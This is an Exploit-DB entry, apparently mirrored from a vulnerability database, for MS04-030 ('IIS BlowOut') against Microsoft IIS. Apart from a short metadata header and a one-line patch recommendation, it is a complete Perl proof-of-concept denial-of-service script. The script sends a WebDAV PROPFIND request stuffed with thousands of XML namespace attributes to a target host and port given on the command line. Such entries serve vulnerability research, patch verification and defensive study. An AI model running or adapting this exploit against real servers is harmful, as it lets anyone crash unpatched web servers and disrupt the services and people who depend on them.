IIS BlowOut

vendor:

Internet Information Server

by:

Amit Klein

N/A

CVSS

N/A

MS04-030

CWE

Product Name: Internet Information Server

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2004-0713

CPE: a:microsoft:internet_information_server:6.0

Metasploit:

Other Scripts:

Platforms Tested:

2004

POC exploit for MS04-030 found by Amit Klein

Mitigation:

Apply the necessary patches and updates provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# IIS BlowOut 
# POC exploit for MS04-030. Found by Amit Klein. 
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" "; 

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " . 
$xmlatt . 
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: 
$host\nContent-length: $l\n\n$xmldata\n\n"; 

syswrite($socket,$req,length($req));

close $socket;

# milw0rm.com [2004-10-20]